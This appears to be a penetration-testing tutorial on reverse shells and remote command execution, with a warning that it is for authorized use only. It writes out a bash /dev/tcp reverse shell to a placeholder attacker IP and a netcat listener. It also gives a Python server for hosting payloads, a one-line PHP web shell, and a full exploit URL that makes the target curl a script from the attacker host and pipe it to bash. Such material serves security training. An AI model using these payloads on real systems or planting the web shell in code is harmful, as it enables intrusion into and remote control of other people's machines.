Reverse Shells and Remote Command Execution

WARNING: These techniques are for authorized ethical hacking, penetration testing, and educational purposes ONLY. Unauthorized access to computer systems is illegal and unethical. Use these commands ONLY on systems you have explicit permission to test.

Introduction

A reverse shell is a type of shell that connects from a target machine back to an attacker’s machine. This is often used in exploitation scenarios where direct inbound connections to the target are blocked by firewalls, but outbound connections are allowed. The target initiates the connection, allowing the attacker to gain command-line access.

Remote Command Execution (RCE) refers to a vulnerability that allows an attacker to execute arbitrary commands on a target system. This is a critical vulnerability that can often lead to a full system compromise.

1. Bash Reverse Shell Payload

This bash command creates a reverse shell that connects back to a specified IP address and port on the attacker’s machine.

#!/bin/bash
bash -i >& /dev/tcp/<YOUR_ATTACKER_IP>/<LISTENER_PORT> 0>&1
  • bash -i: Opens an interactive bash shell.
  • >& /dev/tcp/<YOUR_ATTACKER_IP>/<LISTENER_PORT>: Redirects both stdout and stderr to a TCP connection established to the attacker’s IP and listener port.
  • 0>&1: Redirects stdin to the same TCP connection, making the shell interactive.

2. Attacker’s Netcat Listener

On your attacker machine, you need a listener to catch the incoming reverse shell connection. netcat (nc) is a versatile networking utility often used for this purpose.

nc -nvlp <LISTENER_PORT>
  • -n: Numeric-only IP addresses (no DNS lookups).
  • -v: Verbose output.
  • -l: Listen mode (waits for an incoming connection).
  • -p <LISTENER_PORT>: Specifies the port to listen on (e.g., 1337).

3. Serving Payloads with a Python Web Server

To deliver your reverse shell script or other payloads to the target, you can quickly spin up a simple HTTP server using Python. This server will serve files from the directory it’s run in.

python3 -m http.server 8000

This command starts an HTTP server on port 8000. Any files in the current directory will be accessible via http://<YOUR_ATTACKER_IP>:8000/.

4. PHP Remote Command Execution Vulnerability

A common RCE vulnerability in web applications is the ability to execute arbitrary commands through user input. A simple PHP backdoor for this might look like this:

<?php system($_GET["cmd"]); ?>

If this code is in a file named shell.php on a web server, an attacker can execute commands by passing them in the cmd GET parameter.

Complete Scenario Example: Delivering a Reverse Shell via RCE

Here’s a simplified example of how these components might be used together in an exploitation chain:

  1. Attacker Setup:

    • Save the bash reverse shell payload to a file, e.g., shell.sh.
    • Start a Python web server in the directory containing shell.sh:
      python3 -m http.server 8000
    • Start a Netcat listener on your attacker machine (e.g., port 1337):
      nc -nvlp 1337
  2. Target Exploitation (assuming RCE):

    • Assume the target web server has a PHP page (shell.php) vulnerable to RCE.
    • The attacker sends a request to the vulnerable page, instructing the target to download and execute the reverse shell script hosted on the attacker’s web server.
    http://<TARGET_WEB_SERVER>/shell.php?cmd=curl%20<YOUR_ATTACKER_IP>:8000/shell.sh|bash
    
    • Explanation of cmd parameter:
      • curl <YOUR_ATTACKER_IP>:8000/shell.sh: Downloads the shell.sh script from the attacker’s web server.
      • |bash: Pipes the content of shell.sh directly to bash for execution.
  3. Result:

    • The target machine downloads and executes shell.sh.
    • shell.sh initiates a connection back to the attacker’s nc listener.
    • The attacker gains an interactive shell on the target machine.